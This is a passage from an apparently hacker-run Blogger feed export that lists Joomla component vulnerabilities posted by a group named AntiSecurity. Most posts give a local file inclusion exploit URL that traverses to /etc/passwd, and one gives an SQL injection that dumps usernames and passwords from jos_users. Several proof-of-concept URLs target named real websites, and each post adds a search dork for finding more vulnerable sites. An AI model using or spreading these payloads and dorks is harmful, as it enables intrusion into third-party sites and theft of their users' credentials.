/&gt;inurl:"com_webeecomment"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2445745563568239679?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2445745563568239679/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2445745563568239679' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2445745563568239679'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2445745563568239679'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-webee-comments-lfi.html' title='Joomla Component Webee Comments LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3280110104878702680</id><published>2010-04-06T12:27:00.006+07:00</published><updated>2010-04-08T02:12:03.271+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component News Portal LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component News Portal Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_news_portal version 1.5.x&lt;br /&gt;Vendor   : http://www.ijoomla.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[dot]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_news_portal&amp;amp;controller=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.fight4romania.com/index.php?option=com_news_portal&amp;amp;controller=../../../../../../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_news_portal"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3280110104878702680?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3280110104878702680/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3280110104878702680' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3280110104878702680'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3280110104878702680'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-news-portal-lfi-vuln.html' title='Joomla Component News Portal LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6518451851560131258</id><published>2010-04-06T11:29:00.004+07:00</published><updated>2010-04-08T02:13:00.930+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Highslide JS LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre align="justify"&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Highslide JS Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_hsconfig version 1.5&lt;br /&gt;Vendor   : http://www.joomlanook.com/&lt;br /&gt;Author   : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]&lt;br /&gt;Contact  : public[dot]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_hsconfig&amp;amp;controller=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/index.php?option=com_hsconfig&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_hsconfig"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre align="justify"&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6518451851560131258?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6518451851560131258/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6518451851560131258' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6518451851560131258'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6518451851560131258'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-highslide-js-lfi-vuln.html' title='Joomla Component Highslide JS LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-8168455041415457226</id><published>2010-04-06T11:26:00.003+07:00</published><updated>2010-04-08T02:14:59.554+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component XOBBIX SQL Injection Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component XOBBIX [prodid] SQL Injection Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_xobbix version 1.0.x&lt;br /&gt;Vendor   : http://www.php-shop-system.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[dot]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_xobbix&amp;amp;catid=32&amp;amp;task=prod_desc&amp;amp;prodid=25&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://stutterandsing.com/index.php?option=com_xobbix&amp;amp;catid=31&amp;amp;task=prod_desc&amp;amp;prodid=-21+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8,database(),10,11,12,13,14,15,16+from+jos_users--&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inrul:"com_xobbix"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-8168455041415457226?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/8168455041415457226/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=8168455041415457226' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8168455041415457226'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8168455041415457226'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-xobbix-sql-injection.html' title='Joomla Component XOBBIX SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2792747488362782471</id><published>2010-04-06T11:24:00.003+07:00</published><updated>2010-04-08T02:14:32.371+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Appointment LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Appointment Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_appointment version 1.5&lt;br /&gt;Vendor   : http://thebestmakers.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[dot]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_appointment&amp;amp;controller=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/index.php?option=com_appointment&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_appointment"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2792747488362782471?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2792747488362782471/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2792747488362782471' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2792747488362782471'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2792747488362782471'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-appointment-lfi-vuln.html' title='Joomla Component Appointment LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-4175293992699396681</id><published>2010-04-06T11:21:00.002+07:00</published><updated>2010-04-08T02:15:11.681+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Affiliate Feeds LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Affiliate Feeds Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_datafeeds version 880&lt;br /&gt;Vendor   : http://www.affiliatefeeds.nl/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[dot]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_datafeeds&amp;amp;controller=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.winm0ney.com/index.php?option=com_datafeeds&amp;amp;controller=../../../../../../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_datafeeds"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-4175293992699396681?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/4175293992699396681/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=4175293992699396681' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4175293992699396681'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4175293992699396681'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-affiliate-feeds-lfi.html' title='Joomla Component Affiliate Feeds LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-8804028207230440061</id><published>2010-04-06T11:18:00.003+07:00</published><updated>2010-04-08T02:15:20.278+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Fabrik LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Fabrik Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_fabrik version 2.0&lt;br /&gt;Vendor   : http://fabrikar.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[dot]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_fabrik&amp;amp;controller=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://awards.julib.com/index.php?option=com_fabrik&amp;amp;controller=../../../../../../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_fabrik"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-8804028207230440061?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/8804028207230440061/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=8804028207230440061' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8804028207230440061'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8804028207230440061'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-fabrik-lfi-vuln.html' title='Joomla Component Fabrik LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3280672834973766303</id><published>2010-04-06T11:13:00.004+07:00</published><updated>2010-04-08T02:15:34.130+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component J!WHMCS Integrator LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component J!WHMCS Integrator Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_jwhmcs version 1.5.0&lt;br /&gt;Vendor   : https://client.gohigheris.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[dot]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_jwhmcs&amp;amp;controller=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.websites.co.uk/index.php?option=com_jwhmcs&amp;amp;controller=../../../../../../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_jwhmcs"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3280672834973766303?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3280672834973766303/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3280672834973766303' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3280672834973766303'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3280672834973766303'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-jwhmcs-integrator-lfi.html' title='Joomla Component J!WHMCS Integrator LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2194807079937836004</id><published>2010-04-06T10:47:00.003+07:00</published><updated>2010-04-08T02:16:53.385+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Saber Cart LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Saber Cart Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_sebercart version 1.0.0.12&lt;br /&gt;Vendor   : http://www.seber.com.au/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[dot]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_sebercart&amp;amp;view=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.zoochthepooch.com/index.php?option=com_sebercart&amp;amp;view=../../../../../../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_sebercart"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2194807079937836004?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2194807079937836004/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2194807079937836004' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2194807079937836004'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2194807079937836004'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-saber-cart-lfi-vuln.html' title='Joomla Component Saber Cart LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6225229763397874687</id><published>2010-04-06T10:35:00.004+07:00</published><updated>2010-04-08T02:16:45.543+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Juke Box LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Juke Box Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_jukebox version 1.7&lt;br /&gt;Vendor   : http://www.jooforge.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[dot]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_jukebox&amp;amp;controller=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.livequrantutors.com/app/index.php?option=com_jukebox&amp;amp;controller=../../../../../../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_jukebox"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div 